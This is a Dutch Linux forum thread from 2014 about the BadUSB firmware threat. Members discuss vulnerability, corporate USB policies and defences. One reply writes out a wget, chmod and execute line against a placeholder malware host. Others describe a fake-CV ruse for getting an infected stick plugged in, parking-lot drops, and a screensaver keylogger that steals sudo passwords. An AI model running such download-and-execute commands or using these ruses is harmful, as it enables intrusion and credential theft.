Nieuws:

Welkom, Gast. Alsjeblieft inloggen of registreren.
Heb je de activerings-mail niet ontvangen?

Auteur Topic: Nieuwe bedreiging: besmetting van firmware van USB-apparaten  (gelezen 3473 keer)

Offline Pjotr

  • Lid
    • Makkelijke Linuxtips
Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Gepost op: 2014/08/01, 12:47:20 »
Akelig bericht:
http://www.telegraaf.nl/digitaal/22920798/__Virus_nestelt_zich_in_USB-apparatuur__.html

Achtergrond:
http://www.wired.com/2014/07/usb-security/

Vooral USB-geheugenstaafjes zijn kwetsbaar, uiteraard. Want dat zijn de apparaten met de meeste "wisselende contacten". We moeten wellicht anders gaan omgaan met die dingen...

Overigens is niet duidelijk, of Linux-systemen hier even kwetsbaar voor zijn als Windows-systemen. Mogelijk zijn beide theoretisch even kwetsbaar, maar waarschijnlijk zal de kwaadaardige programmatuur (zoals gebruikelijk) zich vooral richten op Windows en wellicht Android.
« Laatst bewerkt op: 2014/08/01, 12:50:14 door Pjotr »

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #1 Gepost op: 2014/08/01, 13:35:35 »
Telegraaf is wel erg karig. Zelfs bij smartphones noemen ze niet eens welke besturingssytemen.

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #2 Gepost op: 2014/08/01, 13:52:18 »
Citaat
Wanneer een met BadUSB geïnfecteerd USB-apparaat verbonden wordt met een computer kan het allerlei kwaadaardige trucs uithalen, zoals software die geïnstalleerd wordt vervangen door een besmet exemplaar of zich voordoen als een USB-toetsenbord en plotseling allerlei commando’s invoeren.

Vaag, heel vaag. USB-sticks hadden al zéér lang een mogelijkheid tot kwaadaardige software (dat bestaat al sinds 2005) .
Het is me niet duidelijk of ze nieuwe, of lang gebruikte (wisselend met veel computers) sticks bedoelen. Ik weet dat vooral Chinese sticks soms kwaadaardig spul erop hebben staan (doelend op besmetting van Windows ) .

Volgens mij een niet erg doordacht artikel van de Telegraaf; zoals Vistaus opmerkt: welke besturingssystemen zijn er vatbaar voor en welke niet, enzo verder enzovoorts.
Gubuntu 17.04 wegens verdwijnen Unity binnenkort


Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #4 Gepost op: 2014/08/01, 14:33:34 »
Meer info en linkjes:
http://tweakers.net/nieuws/97585/onderzoekers-kraken-firmware-usb-controllers.html

Dit is meteen een stuk duidelijker gemaakt; en nu is de impact van deze malware ook zeer groot.
Theoretisch zou je makkelijk een Linux kunnen hacken via deze methode.
Gubuntu 17.04 wegens verdwijnen Unity binnenkort

Offline testcees

  • Documentatieteam
    • testcees
    • www.testcees.nl
Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #5 Gepost op: 2014/08/01, 21:24:09 »
Overigens is niet duidelijk, of Linux-systemen hier even kwetsbaar voor zijn als Windows-systemen. Mogelijk zijn beide theoretisch even kwetsbaar, maar waarschijnlijk zal de kwaadaardige programmatuur (zoals gebruikelijk) zich vooral richten op Windows en wellicht Android.
Theoretisch even kwetsbaar? Een standaard (usb-stick die zich gedraagt als) toetsenbord werkt met Linux net zo goed als met Windows.

Dat er minder Linux-desktops zijn maakt niet uit, dit kan worden gebruikt voor een doelgerichte (professionele) aanval (op iemand of organisatie die je niet mag) en kan rekening houden met het besturingssysteem van het slachtoffer. Ik verwacht niet snel dat iets of iemand lukraak heel veel besmette usb-sticks gaat rondstrooien (om maar af te wachten wie er in trapt), dan zal het (vroeg of laat/iemand) gaan opvallen.

Misschien is een/de gemiddelde Linux gebruiker zelfs een makkelijker slachtoffer? Met alleen een toetsenbord zijn de mogelijkheden enorm (wget http: //mijnmalwaresite.domein/kwaadscript.sh && chmod +x kwaadscript.sh && ./kwaadscript.sh, enz.).

Gebruikt de malware internet (poort 80) zal de “veilige” (gufw) firewall-instellingen het niet tegenhouden. Mijn  Windows firewall vraagt om toestemming als een nieuw/vreemd programma het internet op wil. Bijvoorbeeld Teamviewer (Remote Access Tool) vroeg de 1e keer toestemming om het internet op te gaan, ClamAV moest ik toestemming geven om virusupdates te downloaden enz. maar in Ubuntu kan dat gelijk (onopvallend).

Teamviewer (niet mijn favoriete RAT) kan je zonder root (sudo) installeren (Run TeamViewer without installation en voor Windows is er een portable-versie) maar waarschijnlijk zal een professionele aanvaller wel wat beters (irc? tor?) gebruiken (door een kwaadscript relatief eenvoudig te installeren en te configureren om beschikbare internetpoorten te gebruiken zonder root/sudo), het gaat om het idee erachter.

Oplossing
Voor de paranoïde Linux gebruiker: plaats de persoonlijke mappen (/home) op een eigen partitie en mount die met de opties noexec,nosuid,nodev
Dan kunnen geen eigen programma's of scripts meer worden gestart (8.1 Software Restriction → punt 2).

Probleem opgelost (maar wel saai dus niet aanbevolen anders oppassen met iets aansluiten, zeker geen vreemde usb-sticks :evil:).
Klik links bovenin op Documentatie

Offline niekn

  • Lid
    • omega-xis
Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #6 Gepost op: 2014/08/04, 10:07:21 »
Probleem opgelost (maar wel saai dus niet aanbevolen anders oppassen met iets aansluiten, zeker geen vreemde usb-sticks :evil:).

en hoe laat je iemand een besmette USB-stick in je pc steken?
loop een bedrijf binnen in een 3-delig pak met een cv met koffie erover heen, zeg dat je zo een sollicitatiegesprek hebt, maar dat je koffie over je CV heen gegooit hebt en vraag of ze een nieuwe voor je willen printen. overhandig je geinfecteerde usb-stick en wallah!!

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #7 Gepost op: 2014/08/04, 11:31:23 »
Probleem opgelost (maar wel saai dus niet aanbevolen anders oppassen met iets aansluiten, zeker geen vreemde usb-sticks :evil:).

en hoe laat je iemand een besmette USB-stick in je pc steken?
loop een bedrijf binnen in een 3-delig pak met een cv met koffie erover heen, zeg dat je zo een sollicitatiegesprek hebt, maar dat je koffie over je CV heen gegooit hebt en vraag of ze een nieuwe voor je willen printen. overhandig je geinfecteerde usb-stick en wallah!!

Dat gaat zo niet werken. Veel bedrijven hebben de USB-poorten in het BIOS uitgeschakeld; alleen het ICT-team en/of de manager hebben dan een computer met werkende USB-poorten. Het ICT-team zal niet zomaar een stickje van je aannemen en de manager zal, zeker in het geval van een sollicitatie, zeker niet zomaar een USB-stickje aannemen voor het printen van een CV dat gewoon in orde had moeten zijn ;)

Offline niekn

  • Lid
    • omega-xis
Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #8 Gepost op: 2014/08/04, 17:30:39 »
@vistaus, dan schat je de mensen toch echt te slim in, de medewerkers van t bedrijf waar ik een ICT-stage ga lopen wisten niet eens hoe ze met PGP een file moesten decrypten....  :|

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #9 Gepost op: 2014/08/04, 20:16:16 »
@vistaus, dan schat je de mensen toch echt te slim in, de medewerkers van t bedrijf waar ik een ICT-stage ga lopen wisten niet eens hoe ze met PGP een file moesten decrypten....  :|

Of jij schat het te algemeen in? Het ene bedrijf is anders als het andere bedrijf hè...

Offline Johan van Dijk

  • Administrator
    • johanvandijk
Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #10 Gepost op: 2014/08/04, 20:48:37 »
Was er vorig jaar niet ook al nieuws dat je iphones (en vergelijkbare apparaten) kon besmetten door ze aan te sluiten op een gemodificeerde oplader?

Edit: ja dus http://arstechnica.com/security/2013/07/trusting-iphones-plugged-into-bogus-chargers-get-a-dose-of-malware/

« Laatst bewerkt op: 2014/08/04, 20:52:08 door Johan van Dijk »

Offline jan11000

  • Lid
Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #11 Gepost op: 2014/08/05, 08:06:43 »
Probleem opgelost (maar wel saai dus niet aanbevolen anders oppassen met iets aansluiten, zeker geen vreemde usb-sticks :evil:).

en hoe laat je iemand een besmette USB-stick in je pc steken?
loop een bedrijf binnen in een 3-delig pak met een cv met koffie erover heen, zeg dat je zo een sollicitatiegesprek hebt, maar dat je koffie over je CV heen gegooit hebt en vraag of ze een nieuwe voor je willen printen. overhandig je geinfecteerde usb-stick en wallah!!

Dat gaat zo niet werken. Veel bedrijven hebben de USB-poorten in het BIOS uitgeschakeld; alleen het ICT-team en/of de manager hebben dan een computer met werkende USB-poorten. Het ICT-team zal niet zomaar een stickje van je aannemen en de manager zal, zeker in het geval van een sollicitatie, zeker niet zomaar een USB-stickje aannemen voor het printen van een CV dat gewoon in orde had moeten zijn ;)
Klopt niet.
Mensen op kantoor hebben dit ook open staan, mogen vaak ook alles installeren. En weten niks van computers.
Dit dus op een groot bedrijf.

Probleem is al oud,
https://hakshop.myshopify.com/collections/usb-rubber-ducky
Zoek maar op rubber ducky, er wordt ook uitgelegd hoe dit werkt.

Hoe je dit op een pc krijgt, gewoon op de parkeer plaats leggen(of in het bedrijf op de grond leggen), de meeste zullen het in de pc op het werkt insteken.
« Laatst bewerkt op: 2014/08/05, 08:09:05 door jan11000 »

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #12 Gepost op: 2014/08/05, 09:45:23 »
Sjongejonge,dit is al zo oud als Methusalem!Het is begonnen met de floppydisk,dat je die dus niet in andermans handen moet geven omdat er dan malware op geschreven kan zijn..Gewoon je USB-stick bij jezelf houden en de kans is erg klein dat je moeilijkheden krijgt.Tenzij natuurlijk de fabriek van die USB-stick het er op zet,maar dat is dan een goede maatregel om die fabriek failliet te laten gaan..
Doe rustig aan,ben ik ook de hele dag druk mee.

Offline Pjotr

  • Lid
    • Makkelijke Linuxtips
Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #13 Gepost op: 2014/08/05, 10:55:36 »
Probleem is al oud,
https://hakshop.myshopify.com/collections/usb-rubber-ducky
Zoek maar op rubber ducky, er wordt ook uitgelegd hoe dit werkt.
Dat lijkt toch iets anders te zijn: als ik het goed begrijp, is Rubber Ducky een speciaal vervaardigd apparaat dat zich identificeert als toetsenbord. De truuk lukt dus alleen met dat apparaat.

De dreiging waar het nu over gaat, betreft *alle* USB-geheugenstaafjes. Sterker nog: het betreft *alle* USB-apparaten, dus ook muizen en toetsenborden. En eenmaal besmet, is er niets aan te doen: het apparaat is niet terug te brengen in de oude staat.

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #14 Gepost op: 2014/08/05, 11:40:18 »
@Jan11000: Luister, ik heb een ICT-opleiding gedaan waarbij we ook de veiligheid van bedrijfscomputers behandeld hebben en ook binnen bedrijven aan de slag moesten. Ik weet dus echt wel hoe dat zit. Natuurlijk is, zoals ik al zei, ieder bedrijf anders. Tuurlijk zitten er bedrijven tussen die alles open hebben staan. Maar er zijn ook veel die dat niet hebben en dat weet ik dus uit eigen ervaring.

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #15 Gepost op: 2014/08/05, 11:54:16 »
Probleem is al oud,
https://hakshop.myshopify.com/collections/usb-rubber-ducky
Zoek maar op rubber ducky, er wordt ook uitgelegd hoe dit werkt.
Dat lijkt toch iets anders te zijn: als ik het goed begrijp, is Rubber Ducky een speciaal vervaardigd apparaat dat zich identificeert als toetsenbord. De truuk lukt dus alleen met dat apparaat.

De dreiging waar het nu over gaat, betreft *alle* USB-geheugenstaafjes. Sterker nog: het betreft *alle* USB-apparaten, dus ook muizen en toetsenborden. En eenmaal besmet, is er niets aan te doen: het apparaat is niet terug te brengen in de oude staat.

Neemt niet weg dat iemand fysiek jouw USB apparaat moet kunnen aanraken om deze te herprogrammeren......
Stel dat dit een lucratieve manier is om te gaan stelen ben ik eerder bang dat er ergens iemand heel veel USB sticks of apparaten gaat opkopen in bijv. China en deze allemaal gaat herprogrammeren, om ze vervolgens voor zeer aantrekkelijke prijzen te verkopen aan deez of geen.
Of misschien wel aan een bedrijf (denk aan een bank)
Op deze manier kunnen ze een grote groep mensen bereiken en bestelen.

Op zich is deze USB hack een serieuze bedreiging voor iedereen, en lijkt het me belangrijk dat de chip fabrikanten heel snel stappen ondernemen hiertegen.

Het feit dat je de computer kan laten denken dat hij een ander apparaat aankoppelt dan het werkelijk is geeft oneindig veel mogelijkheden...
I don't suffer from insanity, I enjoy every minute of it.
Microsoft geeft je een raam, Linux geeft je een heel huis :D

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #16 Gepost op: 2014/08/05, 14:52:08 »
Wie gaat er dan ook een USB apparaat kopen die niet verpakt is in de originele verpakking?Of in een verpakking die duidelijk is open gemaakt?
Doe rustig aan,ben ik ook de hele dag druk mee.

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #17 Gepost op: 2014/08/05, 18:01:37 »
Wie gaat er dan ook een USB apparaat kopen die niet verpakt is in de originele verpakking?Of in een verpakking die duidelijk is open gemaakt?
Je kan een nieuwe verpakking maken.

Ik weet dat er bedrijven zijn die niets anders doen dan een product uit de verpakking halen en vervolgens in een andere verpakking stoppen. Beide liggen vervolgens in de winkel en bijna niemand die weet dat het dus precies hetzelfde product is. En deze bedrijven maken nog winst ook.

Stop hier een fase van het USB-apparaat tussen en niemand die het merkt.

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #18 Gepost op: 2014/08/06, 09:15:57 »
Wie gaat er dan ook een USB apparaat kopen die niet verpakt is in de originele verpakking?Of in een verpakking die duidelijk is open gemaakt?

Als criminelen een dusdanig project gaan beginnen word alles los besteld en word het pas ingepakt zodra alles klaar is.
Kijk maar eens naar sigaretten, onlangs is er nog een professionele fabriek in Nederland opgerold.
Tabak, hulsen, papier alles werd los aangeleverd, machines maakte de sigaretten net als in de originele fabriek en alles werd netjes machinaal verpakt voor de verkoop.
Je zag geen verschil tussen de nep en de echte.

MAW als zij zoiets op poten gaan zetten zoals ik verzon hierboven zal jij nooit weten of je een gehackte koopt of een goede..
I don't suffer from insanity, I enjoy every minute of it.
Microsoft geeft je een raam, Linux geeft je een heel huis :D

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #19 Gepost op: 2014/08/06, 11:34:33 »
In ieder geval niet meer op louche internet site zulke dingen kopen...omdat ze misschien goedkoper zijn.



Nja, als een niet-louche site dit soort dingen aangeleverd krijgt, ben je net zover van huis. Dus wat dat betreft zie ik daar het probleem niet van in: je hebt pech of je hebt het niet ;)

Offline testcees

  • Documentatieteam
    • testcees
    • www.testcees.nl
Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #20 Gepost op: 2014/08/09, 21:35:32 »
Normaal gesproken is een screensaver met wachtwoord een goede beveiligingsmaatregel maar met deze malware is dat niet zeker meer.  :evil:
Screensaver

De onderzoekers merkten op dat Linux-malware met verminderde rechten draait en sudo-rechten nodig heeft om andere USB-sticks die worden aangesloten te infecteren. Hiervoor bedachten de onderzoekers een truc waarbij het sudo-wachtwoord van de gebruiker via een screensaver wordt gestolen. De ingestelde screensaver wordt namelijk herstart met een keylogger. Zodra de gebruiker zijn wachtwoord invult om de screensaver te ontgrendelen, kan de keylogger dit wachtwoord onderscheppen en zo sudo-rechten krijgen.

p.s. De kans dat iemand ongemerkt achter mijn toetsenbord kruipt schat ik zelf veel groter in dan de kans op besmetting via USB firmware en gebruik toch nog maar de screensaver.
Klik links bovenin op Documentatie

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #21 Gepost op: 2014/08/10, 00:17:16 »
In ieder geval niet meer op louche internet site zulke dingen kopen...omdat ze misschien goedkoper zijn.



Nja, als een niet-louche site dit soort dingen aangeleverd krijgt, ben je net zover van huis. Dus wat dat betreft zie ik daar het probleem niet van in: je hebt pech of je hebt het niet ;)
Dat is wel een erg moslim of hindoe gedachte..Denk je zo ook over je dood?
Doe rustig aan,ben ik ook de hele dag druk mee.

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #22 Gepost op: 2014/08/10, 00:18:45 »
@Lowlands: Waar slaat dat nu weer op??? We hadden het over webshops, niet over mijn dood. Hoe ik over zoiets als dit aangaande webshops denk, heeft helemaal niks van doen met hoe ik over mijn dood denk.

P.S.: moslim of hindoe? Mijn religie is Wicca/paganisme.
« Laatst bewerkt op: 2014/08/10, 00:27:51 door Vistaus »

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #23 Gepost op: 2014/08/10, 10:34:10 »
Ik bedoel je slogan,je hebt pech of je hebt dat niet..Dat is net hetzelfde als:als allah het wel dan kan ik er niks aan doen..
Doe rustig aan,ben ik ook de hele dag druk mee.

Re: Nieuwe bedreiging: besmetting van firmware van USB-apparaten
« Reactie #24 Gepost op: 2014/08/10, 11:51:32 »
Ik vind dat een hele vreemde vergelijking die helemaal niks met het onderwerp (noch *mijn* religie) te maken heeft. Ik verzoek je om je weer bij het onderwerp van het topic te voegen.